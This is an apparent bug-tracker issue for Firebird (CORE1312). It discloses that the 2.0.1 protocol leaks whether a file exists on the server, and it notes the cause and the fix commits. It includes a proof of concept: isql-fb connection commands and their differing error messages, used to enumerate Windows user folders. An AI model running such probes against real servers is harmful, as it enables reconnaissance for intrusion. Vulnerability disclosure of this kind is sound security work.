Skip to content

A remote attacker can check, if a file is present in the system, running firebird server [CORE1312] #1731

Closed
@firebird-automations

Description

@firebird-automations

Submitted by: @AlexPeshkoff

Is related to QA132

Bug was reported by David Calligaris <mailto:david.calligaris@emaze.net>:

------------------
There is an information disclosure vulnerability in the Firebird 2.0.1
protocol implementation that could allow a remote attacker to check if a
file is present in the remote system. Successfully exploitation of this
vulnerability allows the remote attacker to launch further attacks on
the remote host.

Proof Of Concept:
-----------------
Example of Windows User Enumeration:

<EXAMPLE>

diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\diaul"
Statement failed, SQLCODE = -902

I/O error for file "C:\Documents and Settings\diaul"
-Error while trying to open file
-Access is denied.

Use CONNECT or CREATE DATABASE to specify a database
SQL>

diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\FooBar"
Statement failed, SQLCODE = -902

I/O error for file "C:\Documents and Settings\FooBar"
-Error while trying to open file
-The system cannot find the file specified.

Use CONNECT or CREATE DATABASE to specify a database
SQL>

</EXAMPLE>

You can see there are two different error messages for valid and invalid
resources.
------------------

The reason of a bug is that password validation is done almost in the end of database attach/create calls.

Commits: c76f165 e5f1e63

Metadata

Metadata

Assignees

Type

No type

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions